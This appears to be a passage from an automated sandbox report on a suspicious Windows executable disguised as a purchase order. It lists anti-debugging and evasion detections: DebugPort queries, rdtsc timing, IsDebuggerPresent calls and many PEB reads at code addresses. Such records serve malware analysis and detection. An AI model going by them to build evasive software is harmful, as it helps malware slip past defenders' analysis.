Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 1_2_004086A0 rdtsc

1_2_004086A0

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 1_2_00409900 LdrLoadDll,

1_2_00409900

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 0_2_0086F175 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0086F175

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

0_2_00879B2F

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00861FA0 mov eax, dword ptr fs:[00000030h]	0_2_00861FA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00887A30 mov eax, dword ptr fs:[00000030h]	0_2_00887A30
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_008885C4 mov eax, dword ptr fs:[00000030h]	0_2_008885C4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00888524 mov eax, dword ptr fs:[00000030h]	0_2_00888524
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00888561 mov eax, dword ptr fs:[00000030h]	0_2_00888561
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]	1_2_01214120
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]	1_2_01214120
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]	1_2_01214120
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]	1_2_01214120
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov ecx, dword ptr fs:[00000030h]	1_2_01214120
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122513A mov eax, dword ptr fs:[00000030h]	1_2_0122513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122513A mov eax, dword ptr fs:[00000030h]	1_2_0122513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9100 mov eax, dword ptr fs:[00000030h]	1_2_011F9100
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9100 mov eax, dword ptr fs:[00000030h]	1_2_011F9100
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9100 mov eax, dword ptr fs:[00000030h]	1_2_011F9100
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B944 mov eax, dword ptr fs:[00000030h]	1_2_0121B944
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B944 mov eax, dword ptr fs:[00000030h]	1_2_0121B944
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB171 mov eax, dword ptr fs:[00000030h]	1_2_011FB171
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB171 mov eax, dword ptr fs:[00000030h]	1_2_011FB171
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC962 mov eax, dword ptr fs:[00000030h]	1_2_011FC962
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012769A6 mov eax, dword ptr fs:[00000030h]	1_2_012769A6
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012261A0 mov eax, dword ptr fs:[00000030h]	1_2_012261A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012261A0 mov eax, dword ptr fs:[00000030h]	1_2_012261A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]	1_2_012B49A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]	1_2_012B49A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]	1_2_012B49A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]	1_2_012B49A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]	1_2_012751BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]	1_2_012751BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]	1_2_012751BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]	1_2_012751BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121C182 mov eax, dword ptr fs:[00000030h]	1_2_0121C182
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A185 mov eax, dword ptr fs:[00000030h]	1_2_0122A185
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222990 mov eax, dword ptr fs:[00000030h]	1_2_01222990
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012841E8 mov eax, dword ptr fs:[00000030h]	1_2_012841E8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB1E1 mov eax, dword ptr fs:[00000030h]	1_2_011FB1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB1E1 mov eax, dword ptr fs:[00000030h]	1_2_011FB1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB1E1 mov eax, dword ptr fs:[00000030h]	1_2_011FB1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]	1_2_0120B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]	1_2_0120B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]	1_2_0120B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]	1_2_0120B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]	1_2_0122002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]	1_2_0122002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]	1_2_0122002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]	1_2_0122002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]	1_2_0122002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]	1_2_0121A830
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]	1_2_0121A830
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]	1_2_0121A830
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]	1_2_0121A830
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277016 mov eax, dword ptr fs:[00000030h]	1_2_01277016
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277016 mov eax, dword ptr fs:[00000030h]	1_2_01277016
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277016 mov eax, dword ptr fs:[00000030h]	1_2_01277016
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C4015 mov eax, dword ptr fs:[00000030h]	1_2_012C4015
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C4015 mov eax, dword ptr fs:[00000030h]	1_2_012C4015
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2073 mov eax, dword ptr fs:[00000030h]	1_2_012B2073
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C1074 mov eax, dword ptr fs:[00000030h]	1_2_012C1074
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01210050 mov eax, dword ptr fs:[00000030h]	1_2_01210050
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01210050 mov eax, dword ptr fs:[00000030h]	1_2_01210050
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012390AF mov eax, dword ptr fs:[00000030h]	1_2_012390AF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0122F0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122F0BF mov eax, dword ptr fs:[00000030h]	1_2_0122F0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122F0BF mov eax, dword ptr fs:[00000030h]	1_2_0122F0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9080 mov eax, dword ptr fs:[00000030h]	1_2_011F9080
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01273884 mov eax, dword ptr fs:[00000030h]	1_2_01273884
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01273884 mov eax, dword ptr fs:[00000030h]	1_2_01273884
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B8E4 mov eax, dword ptr fs:[00000030h]	1_2_0121B8E4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B8E4 mov eax, dword ptr fs:[00000030h]	1_2_0121B8E4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F58EC mov eax, dword ptr fs:[00000030h]	1_2_011F58EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0128B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_0128B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0128B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0128B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0128B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0128B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F40E1 mov eax, dword ptr fs:[00000030h]	1_2_011F40E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F40E1 mov eax, dword ptr fs:[00000030h]	1_2_011F40E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F40E1 mov eax, dword ptr fs:[00000030h]	1_2_011F40E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B131B mov eax, dword ptr fs:[00000030h]	1_2_012B131B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FF358 mov eax, dword ptr fs:[00000030h]	1_2_011FF358
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01223B7A mov eax, dword ptr fs:[00000030h]	1_2_01223B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01223B7A mov eax, dword ptr fs:[00000030h]	1_2_01223B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FDB40 mov eax, dword ptr fs:[00000030h]	1_2_011FDB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8B58 mov eax, dword ptr fs:[00000030h]	1_2_012C8B58
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FDB60 mov ecx, dword ptr fs:[00000030h]	1_2_011FDB60
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C5BA5 mov eax, dword ptr fs:[00000030h]	1_2_012C5BA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224BAD mov eax, dword ptr fs:[00000030h]	1_2_01224BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224BAD mov eax, dword ptr fs:[00000030h]	1_2_01224BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224BAD mov eax, dword ptr fs:[00000030h]	1_2_01224BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B138A mov eax, dword ptr fs:[00000030h]	1_2_012B138A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AD380 mov ecx, dword ptr fs:[00000030h]	1_2_012AD380
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01201B8F mov eax, dword ptr fs:[00000030h]	1_2_01201B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01201B8F mov eax, dword ptr fs:[00000030h]	1_2_01201B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122B390 mov eax, dword ptr fs:[00000030h]	1_2_0122B390
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222397 mov eax, dword ptr fs:[00000030h]	1_2_01222397
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]	1_2_012203E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]	1_2_012203E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]	1_2_012203E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]	1_2_012203E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]	1_2_012203E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]	1_2_012203E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0121DBE9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3 mov ecx, dword ptr fs:[00000030h]	1_2_012A23E3
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3 mov ecx, dword ptr fs:[00000030h]	1_2_012A23E3
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3 mov eax, dword ptr fs:[00000030h]	1_2_012A23E3
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012753CA mov eax, dword ptr fs:[00000030h]	1_2_012753CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012753CA mov eax, dword ptr fs:[00000030h]	1_2_012753CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]	1_2_0121A229
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FAA16 mov eax, dword ptr fs:[00000030h]	1_2_011FAA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FAA16 mov eax, dword ptr fs:[00000030h]	1_2_011FAA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01234A2C mov eax, dword ptr fs:[00000030h]	1_2_01234A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01234A2C mov eax, dword ptr fs:[00000030h]	1_2_01234A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov eax, dword ptr fs:[00000030h]	1_2_011F5210
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov ecx, dword ptr fs:[00000030h]	1_2_011F5210
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov eax, dword ptr fs:[00000030h]	1_2_011F5210
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov eax, dword ptr fs:[00000030h]	1_2_011F5210
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01208A0A mov eax, dword ptr fs:[00000030h]	1_2_01208A0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01213A1C mov eax, dword ptr fs:[00000030h]	1_2_01213A1C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAA16 mov eax, dword ptr fs:[00000030h]	1_2_012BAA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAA16 mov eax, dword ptr fs:[00000030h]	1_2_012BAA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AB260 mov eax, dword ptr fs:[00000030h]	1_2_012AB260
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AB260 mov eax, dword ptr fs:[00000030h]	1_2_012AB260
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8A62 mov eax, dword ptr fs:[00000030h]	1_2_012C8A62
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123927A mov eax, dword ptr fs:[00000030h]	1_2_0123927A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]	1_2_011F9240
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]	1_2_011F9240
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]	1_2_011F9240
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]	1_2_011F9240
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BEA55 mov eax, dword ptr fs:[00000030h]	1_2_012BEA55
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01284257 mov eax, dword ptr fs:[00000030h]	1_2_01284257
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0120AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0120AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0122FAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122D294 mov eax, dword ptr fs:[00000030h]	1_2_0122D294
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122D294 mov eax, dword ptr fs:[00000030h]	1_2_0122D294
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]	1_2_011F52A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]	1_2_011F52A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]	1_2_011F52A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]	1_2_011F52A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]	1_2_011F52A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
